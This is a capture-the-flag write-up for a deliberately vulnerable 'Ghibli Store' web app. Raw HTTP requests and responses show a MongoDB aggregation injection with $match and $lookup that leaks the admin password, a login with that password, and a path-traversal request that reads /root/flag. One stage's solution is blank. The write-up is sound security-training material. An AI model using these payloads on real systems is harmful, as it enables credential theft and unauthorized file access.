Ghibli Store
Stage 001
BRIEFING
Difficulty: Introductory
We're working on a new Ghibli store to sell the cutest plush toys you'll find on the internet! We don't have all the products in stock yet, can you find the hidden item?
Challenge Host: http://ghibli.pwn.site:8035/
Work/Solution
The following API request is fired off when loading the link above.
POST /api/products HTTP/1.1
Host: ghibli.pwn.site:8035
Content-Length: 37
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Content-Type: application/json
Accept: */*
Origin: http://ghibli.pwn.site:8035
Referer: http://ghibli.pwn.site:8035/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close
{"query":{"$match":{"instock":true}}}
HTTP/1.1 200 OK
X-Powered-By: Express
Content-Type: application/json; charset=utf-8
Content-Length: 1400
Date: Wed, 28 Feb 2024 19:26:16 GMT
Connection: close
{"status":true,"data":[{"_id":1,"name":"Teto Fox","description":"Castle in The Sky Teto Fox Squirrel Beanbag Stuffed Animal","price":"38.44","image":"teto.jpg","instock":true},{"_id":2,"name":"My Neighbor Totoro","description":"Studio Ghibli My Neighbor Totoro 30/40/50cm","price":"41.30","image":"totoro.jpg","instock":true},{"_id":3,"name":"Plush Toy Studio","description":"My Neighbor Totoro Plush Toy Studio","price":"42.81","image":"plush.jpg","instock":true},{"_id":4,"name":"Howl's Moving","description":"Enesco Howl's Moving Castle 11\" Heen Bean Bag Plush","price":"41.88","image":"hawl.jpeg","instock":true},{"_id":5,"name":"Spirited Away Haku","description":"Ghibli Miyazaki Hayao Plush Toy, Spirited Away Haku, 28 Cm, Cute Doll Stuffed, Plush Play Pillow, Small, White Dragon, U-Shaped Pillow","price":"45.53","image":"hak-u.jpg","instock":true},{"_id":6,"name":"Meichan M Plush Toy","description":"Studio Ghibli My Neighbor Totoro Meichan M Plush Toy, Height 17.7 inches","price":"48.88","image":"neighbor.jpg","instock":true},{"_id":7,"name":"Cat Bus Plush Doll","description":"30cm My Neighbor Totoro Cat Bus Plush Doll Catbus Soft Toy Stuffed Toy Gifts","price":"46.25","image":"bus.jpeg","instock":true},{"_id":8,"name":"Kiki's Delivery Service","description":"Kiki's Delivery Service Stuffed Exhausted size S Jiji /Studio Ghibli","price":"44.13","image":"kiki.jpg","instock":true}]}
So can we just look for the not in stock items?
POST /api/products HTTP/1.1
Host: ghibli.pwn.site:8035
Content-Length: 38
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Content-Type: application/json
Accept: */*
Origin: http://ghibli.pwn.site:8035
Referer: http://ghibli.pwn.site:8035/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close
{"query":{"$match":{"instock":false}}}
HTTP/1.1 200 OK
X-Powered-By: Express
Content-Type: application/json; charset=utf-8
Content-Length: 158
Date: Wed, 28 Feb 2024 19:27:27 GMT
Connection: close
{"status":true,"data":[{"_id":1337,"name":"flag","description":"flag{s1mpl3_m47ch_w45_4ll_1t_n33d3d}","price":"1337","image":"neighbor.jpg","instock":false}]}
flag{s1mpl3_m47ch_w45_4ll_1t_n33d3d}
Oh super easy.
Stage 002
BRIEFING
Difficulty: Medium
Oh my, did you find the secret product already? Well, we have an admin panel for the store, and you can log in from /login. Can you find the admin user's password as well and login to the console?
Work/Solution
Attempt to log in with random credentials.
POST /api/login HTTP/1.1
Host: ghibli.pwn.site:8035
Content-Length: 39
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Content-Type: application/json
Accept: */*
Origin: http://ghibli.pwn.site:8035
Referer: http://ghibli.pwn.site:8035/login
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close
{"username":"admin","password":"admin"}
HTTP/1.1 401 Unauthorized
X-Powered-By: Express
Content-Type: application/json; charset=utf-8
Content-Length: 33
Date: Wed, 28 Feb 2024 19:29:48 GMT
Connection: close
{"message":"Invalid credentials"}
Ok, how can I query information for this?
Got this from https://exploit-notes.hdks.org/exploit/database/mongodb-pentesting/.
# $lookup: join to a collection in the same database to filter in documents from the "joined" collection for processing.
{
$lookup:
{
from: "users",
localField: "_id",
foreignField: "_id",
as: "test"
}
}
Just had to tweak it to nest it in the existing query sent in the previous stage, then got the user info joined in the first result.
POST /api/products HTTP/1.1
Host: ghibli.pwn.site:8035
Content-Length: 90
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Content-Type: application/json
Accept: */*
Origin: http://ghibli.pwn.site:8035
Referer: http://ghibli.pwn.site:8035/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close
{"query":{"$lookup":{"from":"users","localField":"_id","foreignField":"_id","as":"test"}}}
HTTP/1.1 200 OK
X-Powered-By: Express
Content-Type: application/json; charset=utf-8
Content-Length: 1693
Date: Thu, 29 Feb 2024 19:46:35 GMT
Connection: close
{"status":true,"data":[{"_id":1,"name":"Teto Fox","description":"Castle in The Sky Teto Fox Squirrel Beanbag Stuffed Animal","price":"38.44","image":"teto.jpg","instock":true,"test":[{"_id":1,"username":"admin","password":"sup3r_s3cr37_p455w0rd_31337"}]},{"_id":2,"name":"My Neighbor Totoro",... ...}]}
Attempted to log in with the above credentials.
POST /api/login HTTP/1.1
Host: ghibli.pwn.site:8035
Content-Length: 61
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Content-Type: application/json
Accept: */*
Origin: http://ghibli.pwn.site:8035
Referer: http://ghibli.pwn.site:8035/login
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close
{"username":"admin","password":"sup3r_s3cr37_p455w0rd_31337"}
HTTP/1.1 200 OK
X-Powered-By: Express
Set-Cookie: session=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNzA5MjM2MjA0fQ.KPfsGERr7PJpHDbhuegKopZ-LAqTIIlhSEqAXHpKJwA; Max-Age=3600; Path=/; Expires=Thu, 29 Feb 2024 20:50:04 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 36
Date: Thu, 29 Feb 2024 19:50:04 GMT
Connection: close
{"message":"Logged in successfully"}
Flag was shown on the /admin page after the redirect loaded.
flag{y0u_l00k3d_m3_up!?}
Stage 003
BRIEFING
Difficulty: Hard
Impressive of you to have infiltrated our admin panel! Well, the admin panel is not fully ready yet and doesn't contain any major features, so we should be good, right? Right?? Just in case, we've hidden a flag inside a file.
Work/Solution
Stage 004
BRIEFING
Difficulty: Extreme
Work/Solution
Found LFI in admin export functinality.
GET /admin/export?file=../../../../../../../../../../../root/flag HTTP/1.1
Host: ghibli.pwn.site:8035
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://ghibli.pwn.site:8035/admin/database
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: session=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNzA5MjM2MjA0fQ.KPfsGERr7PJpHDbhuegKopZ-LAqTIIlhSEqAXHpKJwA
Connection: close
HTTP/1.1 200 OK
X-Powered-By: Express
Content-Disposition: attachment; filename="flag"
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Tue, 27 Feb 2024 20:52:05 GMT
ETag: W/"1d-18dec56c187"
Content-Type: application/octet-stream
Content-Length: 29
Date: Thu, 29 Feb 2024 20:13:05 GMT
Connection: close
flag{y0u_B1nd3d_y0ur_w4y_in!}